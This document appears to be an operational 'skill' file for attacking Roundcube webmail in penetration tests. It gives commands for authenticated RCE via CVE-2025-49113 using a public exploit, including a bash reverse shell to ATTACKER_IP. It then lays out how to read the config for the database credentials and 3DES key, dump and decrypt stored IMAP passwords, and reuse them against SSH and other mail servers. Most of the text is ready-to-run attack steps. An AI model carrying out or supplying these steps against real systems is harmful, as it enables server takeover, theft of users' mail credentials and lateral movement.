Roundcube Pentesting Skill

A comprehensive skill for exploiting Roundcube webmail vulnerabilities and recovering credentials during penetration testing engagements.

When to Use This Skill

Use this skill when:

• You've identified a Roundcube webmail installation during reconnaissance
• You have valid Roundcube credentials and need to escalate to RCE
• You've gained access to a Roundcube server and need to recover IMAP passwords
• You're testing for CVE-2025-49113 (PHP object deserialization RCE)
• You need to decrypt Roundcube session data for lateral movement

Quick Start

1. Identify Roundcube Installation

# Check for Roundcube fingerprints in HTML source
curl -s http://mail.target.tld | grep -i rcversion

# Look for common Roundcube paths
httpx -u http://mail.target.tld -mc 200 -f roundcube

2. Exploit CVE-2025-49113 (Authenticated RCE)

Affected versions:

• 1.6.x before 1.6.11
• 1.5.x before 1.5.10

Requirements:

• Valid Roundcube username and password
• Accessible Roundcube web UI

Exploitation:

# Clone the public PoC
git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
cd CVE-2025-49113-exploit

# Basic command execution
php CVE-2025-49113.php http://mail.target.tld USERNAME PASSWORD "id"

# Blind RCE validation (timing-based)
time php CVE-2025-49113.php http://mail.target.tld USERNAME PASSWORD "sleep 5"

# Reverse shell
nc -nvlp 443
php CVE-2025-49113.php http://mail.target.tld USERNAME PASSWORD \
  "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"

Notes:

• Output is often blind; use

  sleep N

  to validate RCE
• Shell typically runs as

  www-data

• In containers, expect

  /.dockerenv

  and

  172.17.0.0/16

  networking

3. Recover IMAP Passwords from Sessions

Roundcube stores IMAP passwords encrypted with 3DES in the session database. With filesystem or DB access, you can recover plaintext passwords.

Step 1: Extract Configuration

# Read DB credentials and 3DES key
cat /var/www/html/roundcube/config/config.inc.php | grep -E "(db_dsnw|des_key)"

# Typical output:
# $config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
# $config['des_key'] = 'rcmail-!24ByteDESkey*Str';

Step 2: Dump Session Data

# Connect to database
mysql -u roundcube -p roundcube

# Query sessions
SELECT id, created, changed, vars FROM session\G

# Or export to file
mysql -u roundcube -pDB_PASS roundcube -e "SELECT vars FROM session" > sessions.txt

Step 3: Decrypt Passwords

Option A: Use Roundcube's built-in decrypt script

cd /var/www/html/roundcube
./bin/decrypt.sh CIPHERTEXT_BASE64

Option B: Use the provided decryption script

# Decrypt a single session
python3 scripts/decrypt_roundcube_session.py \
  --des-key "rcmail-!24ByteDESkey*Str" \
  --ciphertext "BASE64_CIPHERTEXT"

# Batch decrypt all sessions from DB
python3 scripts/decrypt_roundcube_session.py \
  --des-key "rcmail-!24ByteDESkey*Str" \
  --db-dsn "mysql://roundcube:DB_PASS@localhost/roundcube" \
  --output decrypted_passwords.json

Option C: Manual extraction (quick check)

# Base64 decode and search for password field
echo 'BASE64_FROM_VARS' | base64 -d | tr ';' '\n' | grep -i password

Post-Exploitation Pivot

Credential Reuse Testing

# Test recovered IMAP credentials against SSH
for cred in $(cat recovered_passwords.txt); do
  sshpass -p "$cred" ssh user@target && echo "SSH SUCCESS: $cred"
done

# Test against other mail services
for cred in $(cat recovered_passwords.txt); do
  nmap -p 143,993 --script imap-brute,imap-ntlm-info -oN imap_test.txt \
    --script-args userdb=users.txt,passdb=<(echo "$cred") target
done

Lateral Movement

# Check for other mailboxes in the same DB
mysql -u roundcube -p roundcube -e "SELECT username, email FROM users"

# Try recovered credentials on other Roundcube instances
for user in $(mysql -u roundcube -p roundcube -e "SELECT username FROM users"); do
  for pass in $(cat recovered_passwords.txt); do
    # Test against other mail servers
    curl -s -u "$user:$pass" http://other-mail.target.tld/ | grep -i "welcome"
  done
done

Common Locations

/var/www/html/roundcube/config/config.inc.php

/var/www/html/roundcube/bin/decrypt.sh

roundcube

session

users

Example Workflow

1. Recon: Identify Roundcube on mail.target.tld
2. Enumerate: Check version via HTML source (rcversion)
3. Exploit: Use CVE-2025-49113 with valid credentials → RCE
4. Pivot: Access filesystem, read config.inc.php
5. Extract: Dump session table from MySQL
6. Decrypt: Recover IMAP passwords using des_key
7. Expand: Test credentials against SSH, other mail services

Scripts Reference

decrypt_roundcube_session.py

Decrypts Roundcube session data using 3DES-CBC.

# Single ciphertext
python3 scripts/decrypt_roundcube_session.py \
  --des-key "YOUR_24_BYTE_KEY" \
  --ciphertext "BASE64_CIPHERTEXT"

# From database
python3 scripts/decrypt_roundcube_session.py \
  --des-key "YOUR_24_BYTE_KEY" \
  --db-dsn "mysql://user:pass@host/db" \
  --output results.json

# From file
python3 scripts/decrypt_roundcube_session.py \
  --des-key "YOUR_24_BYTE_KEY" \
  --input sessions.txt \
  --output results.json

recover_imap_passwords.sh

Automated password recovery from Roundcube installation.

# Auto-detect and recover
./scripts/recover_imap_passwords.sh /var/www/html/roundcube

# Specify paths
./scripts/recover_imap_passwords.sh \
  --config /path/to/config.inc.php \
  --output recovered_creds.txt

Security Notes

• CVE-2025-49113 is authenticated RCE - you need valid credentials first
• Output is often blind; use timing-based validation
• The 3DES key must be exactly 24 bytes
• Session data format:

  Base64(IV(8B) || 3DES-CBC(plaintext))

• Older session rows may contain previous users' credentials

References

• Roundcube Security Updates 1.6.11/1.5.10
• CVE-2025-49113 NVD
• hakaioffsec/CVE-2025-49113-exploit
• Roundcube decrypt.sh